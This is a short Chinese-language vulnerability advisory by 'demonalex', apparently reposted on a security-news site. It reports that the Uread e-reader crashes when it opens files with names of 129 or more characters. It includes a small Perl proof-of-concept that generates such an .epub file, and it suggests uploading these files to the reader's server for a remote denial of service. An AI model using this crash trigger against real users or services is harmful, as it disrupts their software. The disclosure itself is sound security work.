Uread阅读器拒绝服务漏洞的分析与解决

网络安全 2021-07-03 10:02www.168986.cn网络安全知识
Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。
远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端,实现远程拒绝服务攻击。
测试证明
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile \"a\"x129.epub------\n";
open(TESTFILE, ">$filename.epub");
sleep(3);
close(TESTFILE);
print "------Complete!------\n";
exit(1);
-----------------------------------------------------------
修复方案
目前厂商还没有提供补丁或者升级程序。
作者 demonalex

Copyright © 2016-2025 www.168986.cn 狼蚁网络 版权所有 Power by